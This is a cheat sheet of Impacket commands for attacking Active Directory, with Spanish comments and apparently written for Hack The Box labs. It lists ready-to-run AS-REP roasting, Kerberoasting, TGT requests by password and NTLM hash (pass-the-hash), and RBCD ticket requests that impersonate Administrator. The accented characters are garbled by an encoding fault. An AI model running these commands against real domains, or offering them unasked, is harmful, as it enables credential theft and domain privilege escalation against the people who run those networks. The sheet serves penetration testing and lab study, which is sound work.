Impacket
AS-REP Roast (GetNPUsers)
# AS-REP Roasting a trav茅s de un listado de usuarios en 'users.txt'
impacket-GetNPUsers -no-pass -usersfile users.txt dominio.htb/ 2>/dev/null
# AS-REP Roasting para un usuario en concreto
impacket-GetNPUsers dominio.htb/usuer -no-pass 2>/dev/nullKerberoasting Attack (GetUserSPNs)
# Kerberoasting Attack con credenciales v谩lidas y autenticaci贸n NTLM
impacket-GetUserSPNs -dc-ip 10.10.10.10 dominio.htb/user -request 2>/dev/null
impacket-GetUserSPNs -dc-ip 10.10.10.10 dominio.htb/user:'password' -request 2>/dev/null
# Kerberoasting Attack a trav茅s de autenticaci贸n Kerberos
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.dominio.htb dominio.htb/user -k -no-pass -request 2>/dev/null
# Kerberoasting sin credenciales de dominio pero con un usuario AS-REP Roast, necesario disponer de lista de usuarios en 'users.txt'
impacket-GetUserSPNs -no-preauth 'usuario-asrep' -request -usersfile users.txt dominio.htb/ -dc-ip 10.10.10.161 2>/dev/nullObtaining Ticket Granting Ticket [TGT] (getTGT)
# Obtenci贸n de TGT a trav茅s de contrase帽a b谩sica
impacket-getTGT dominio.htb/user:'password' -dc-ip 10.10.10.10
# Obtenci贸n de TGT a trav茅s de Hash NTLM
impacket-getTGT dominio.htb/user -hashes :<NTLM_HASH> -dc-ip 10.10.10.10
# Obtenci贸n de TGT a trav茅s de Autenticaci贸n Kerberos
impacket-getTGT dominio.htb/user -k -no-pass -dc-ip 10.10.10.10Resource Based Constrained Delegation [RBCD] (getST)
# RBCD a trav茅s de autenticaci贸n NTLM
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd':'password' 2>/dev/null
# RBCD a trav茅s de PassTheHash
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd' -hashes :<NTLM_HASH> 2>/dev/null
# RBCD a trav茅s de Autenticaci贸n Kerberos
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd' -k -no-pass 2>/dev/null脷ltima actualizaci贸n